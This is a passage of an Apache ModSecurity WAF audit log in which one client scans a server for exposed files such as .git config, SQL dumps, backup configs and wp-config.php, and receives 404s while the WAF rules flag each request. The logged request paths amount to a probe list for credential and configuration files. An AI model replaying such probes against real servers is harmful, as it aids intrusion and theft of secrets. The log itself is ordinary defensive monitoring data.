"/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/src/.git/"] [unique_id "aFCsLArsPejRtmHkrKLg1gAAAAE"] Stopwatch: 1750117420907784 2983 (- - -) Stopwatch2: 1750117420907784 2983; combined=1775, p1=435, p2=1225, p3=21, p4=44, p5=50, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --77c2e016-Z-- --704beb67-A-- [17/Jun/2025:05:13:41.021524 +0530] aFCsLWMOUduHrxpwbslYmQAAAAM 185.177.72.204 35750 127.0.0.1 7080 --704beb67-B-- GET /src/.git/HEAD HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --704beb67-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --704beb67-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/src/.git/HEAD"] [unique_id "aFCsLWMOUduHrxpwbslYmQAAAAM"] Stopwatch: 1750117421018265 3305 (- - -) Stopwatch2: 1750117421018265 3305; combined=1957, p1=419, p2=1448, p3=21, p4=22, p5=47, sr=105, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --704beb67-Z-- --bf3eaa0f-A-- [17/Jun/2025:05:13:41.131720 +0530] aFCsLdyZ4SMykfn97vy3zAAAAAs 185.177.72.204 35752 127.0.0.1 7080 --bf3eaa0f-B-- GET /src/.git/config HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --bf3eaa0f-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --bf3eaa0f-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/src/.git/config"] [unique_id "aFCsLdyZ4SMykfn97vy3zAAAAAs"] Stopwatch: 1750117421128898 2865 (- - -) Stopwatch2: 1750117421128898 2865; combined=1674, p1=373, p2=1203, p3=22, p4=23, p5=53, sr=90, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --bf3eaa0f-Z-- --f578ac59-A-- [17/Jun/2025:05:13:41.242221 +0530] aFCsLYoVQnPDyHnl9oPT-QAAAAY 185.177.72.204 35768 127.0.0.1 7080 --f578ac59-B-- GET /src/.git/logs/HEAD HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --f578ac59-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --f578ac59-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/src/.git/logs/HEAD"] [unique_id "aFCsLYoVQnPDyHnl9oPT-QAAAAY"] Stopwatch: 1750117421238934 3332 (- - -) Stopwatch2: 1750117421238934 3332; combined=2031, p1=405, p2=1529, p3=23, p4=25, p5=49, sr=114, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --f578ac59-Z-- --588d0943-A-- [17/Jun/2025:05:13:41.352588 +0530] aFCsLQJ4p5Cdblnjra54NwAAAAI 185.177.72.204 35780 127.0.0.1 7080 --588d0943-B-- GET /src/.gitignore HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --588d0943-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --588d0943-H-- Message: Warning. Matched phrase "/.gitignore" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.gitignore" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/src/.gitignore"] [unique_id "aFCsLQJ4p5Cdblnjra54NwAAAAI"] Stopwatch: 1750117421349381 3251 (- - -) Stopwatch2: 1750117421349381 3251; combined=1947, p1=446, p2=1397, p3=20, p4=26, p5=57, sr=92, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --588d0943-Z-- --3bee5d59-A-- [17/Jun/2025:05:13:41.462708 +0530] aFCsLVCTF37l_jAzt4oTPQAAAAU 185.177.72.204 35794 127.0.0.1 7080 --3bee5d59-B-- GET /src/access.log HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --3bee5d59-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --3bee5d59-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/src/access.log"] [unique_id "aFCsLVCTF37l_jAzt4oTPQAAAAU"] Stopwatch: 1750117421459740 3010 (- - -) Stopwatch2: 1750117421459740 3010; combined=1789, p1=333, p2=1366, p3=19, p4=23, p5=48, sr=88, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --3bee5d59-Z-- --0c726269-A-- [17/Jun/2025:05:13:41.683614 +0530] aFCsLdyZ4SMykfn97vy3zQAAAAs 185.177.72.204 35804 127.0.0.1 7080 --0c726269-B-- GET /src/app.js.bak HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --0c726269-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --0c726269-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".js.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".js.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/src/app.js.bak"] [unique_id "aFCsLdyZ4SMykfn97vy3zQAAAAs"] Stopwatch: 1750117421680003 3664 (- - -) Stopwatch2: 1750117421680003 3664; combined=2330, p1=419, p2=1787, p3=21, p4=25, p5=78, sr=109, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --0c726269-Z-- --d154e91d-A-- [17/Jun/2025:05:13:41.794066 +0530] aFCsLVJfblPUQiSn5r2R6AAAAAA 185.177.72.204 35820 127.0.0.1 7080 --d154e91d-B-- GET /src/backup.sql HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --d154e91d-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --d154e91d-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/src/backup.sql"] [unique_id "aFCsLVJfblPUQiSn5r2R6AAAAAA"] Stopwatch: 1750117421790782 3328 (- - -) Stopwatch2: 1750117421790782 3328; combined=2107, p1=339, p2=1669, p3=20, p4=26, p5=53, sr=94, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --d154e91d-Z-- --0d17ea07-A-- [17/Jun/2025:05:13:42.457519 +0530] aFCsLgrsPejRtmHkrKLg2AAAAAE 185.177.72.204 35858 127.0.0.1 7080 --0d17ea07-B-- GET /src/config.php.bak HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --0d17ea07-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --0d17ea07-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".php.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".php.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/src/config.php.bak"] [unique_id "aFCsLgrsPejRtmHkrKLg2AAAAAE"] Stopwatch: 1750117422454547 3015 (- - -) Stopwatch2: 1750117422454547 3015; combined=1853, p1=333, p2=1403, p3=19, p4=25, p5=73, sr=101, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --0d17ea07-Z-- --24022836-A-- [17/Jun/2025:05:13:42.678475 +0530] aFCsLooVQnPDyHnl9oPT-wAAAAY 185.177.72.204 35884 127.0.0.1 7080 --24022836-B-- GET /src/db.sql HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --24022836-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --24022836-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/src/db.sql"] [unique_id "aFCsLooVQnPDyHnl9oPT-wAAAAY"] Stopwatch: 1750117422675175 3346 (- - -) Stopwatch2: 1750117422675175 3346; combined=2002, p1=352, p2=1527, p3=22, p4=27, p5=74, sr=105, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --24022836-Z-- --103c7406-A-- [17/Jun/2025:05:13:42.981740 +0530] aFCsLlCTF37l_jAzt4oTPwAAAAU 185.177.72.204 35902 127.0.0.1 7080 --103c7406-B-- GET /src/debug.log HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --103c7406-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --103c7406-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/src/debug.log"] [unique_id "aFCsLlCTF37l_jAzt4oTPwAAAAU"] Stopwatch: 1750117422897400 84398 (- - -) Stopwatch2: 1750117422897400 84398; combined=164373, p1=360, p2=1358, p3=21, p4=30, p5=81342, sr=118, sw=1, l=0, gc=81261 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --103c7406-Z-- --73891059-A-- [17/Jun/2025:05:13:43.121846 +0530] aFCsL5VkCcfT-Z8NQYzFQAAAAAc 185.177.72.204 35912 127.0.0.1 7080 --73891059-B-- GET /src/dump.sql HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --73891059-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --73891059-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/src/dump.sql"] [unique_id "aFCsL5VkCcfT-Z8NQYzFQAAAAAc"] Stopwatch: 1750117423118701 3190 (- - -) Stopwatch2: 1750117423118701 3190; combined=1995, p1=338, p2=1555, p3=20, p4=25, p5=57, sr=94, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --73891059-Z-- --b962a314-A-- [17/Jun/2025:05:13:43.342894 +0530] aFCsLwGFf516NUzzD0B3ogAAAAg 185.177.72.204 35930 127.0.0.1 7080 --b962a314-B-- GET /src/error.log HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --b962a314-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --b962a314-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/src/error.log"] [unique_id "aFCsLwGFf516NUzzD0B3ogAAAAg"] Stopwatch: 1750117423339686 3252 (- - -) Stopwatch2: 1750117423339686 3252; combined=1967, p1=385, p2=1487, p3=18, p4=25, p5=51, sr=123, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --b962a314-Z-- --3a577c3a-A-- [17/Jun/2025:05:13:43.682340 +0530] aFCsL1CTF37l_jAzt4oTQAAAAAU 185.177.72.204 35956 127.0.0.1 7080 --3a577c3a-B-- GET /src/logs/error.log HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --3a577c3a-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --3a577c3a-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/src/logs/error.log"] [unique_id "aFCsL1CTF37l_jAzt4oTQAAAAAU"] Stopwatch: 1750117423679183 3201 (- - -) Stopwatch2: 1750117423679183 3201; combined=1983, p1=329, p2=1560, p3=18, p4=25, p5=51, sr=96, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --3a577c3a-Z-- --f9eec22f-A-- [17/Jun/2025:05:13:44.233395 +0530] aFCsMOTJOk1gXj_qIh4YPwAAAAQ 185.177.72.204 35996 127.0.0.1 7080 --f9eec22f-B-- GET /src/site.conf HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --f9eec22f-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --f9eec22f-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/src/site.conf"] [unique_id "aFCsMOTJOk1gXj_qIh4YPwAAAAQ"] Stopwatch: 1750117424230439 2999 (- - -) Stopwatch2: 1750117424230439 2999; combined=1837, p1=335, p2=1408, p3=19, p4=25, p5=50, sr=99, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --f9eec22f-Z-- --65a5880d-A-- [17/Jun/2025:05:13:44.343404 +0530] aFCsMFCTF37l_jAzt4oTQQAAAAU 185.177.72.204 36002 127.0.0.1 7080 --65a5880d-B-- GET /src/site.sql HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --65a5880d-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --65a5880d-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/src/site.sql"] [unique_id "aFCsMFCTF37l_jAzt4oTQQAAAAU"] Stopwatch: 1750117424340533 2930 (- - -) Stopwatch2: 1750117424340533 2930; combined=1746, p1=331, p2=1324, p3=19, p4=24, p5=48, sr=88, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --65a5880d-Z-- --5ac4bc3f-A-- [17/Jun/2025:05:13:44.453836 +0530] aFCsMJWbMc1Q3J_M-mhI-QAAAAo 185.177.72.204 36016 127.0.0.1 7080 --5ac4bc3f-B-- GET /src/wp-config.php HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --5ac4bc3f-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --5ac4bc3f-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/src/wp-config.php"] [unique_id "aFCsMJWbMc1Q3J_M-mhI-QAAAAo"] Stopwatch: 1750117424450719 3161 (- - -) Stopwatch2: 1750117424450719 3161; combined=1997, p1=383, p2=1505, p3=27, p4=32, p5=50, sr=101, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --5ac4bc3f-Z-- --da810616-A-- [17/Jun/2025:05:13:44.564053 +0530] aFCsMArsPejRtmHkrKLg2gAAAAE 185.177.72.204 36022 127.0.0.1 7080 --da810616-B-- GET /src/wp-config.php.old 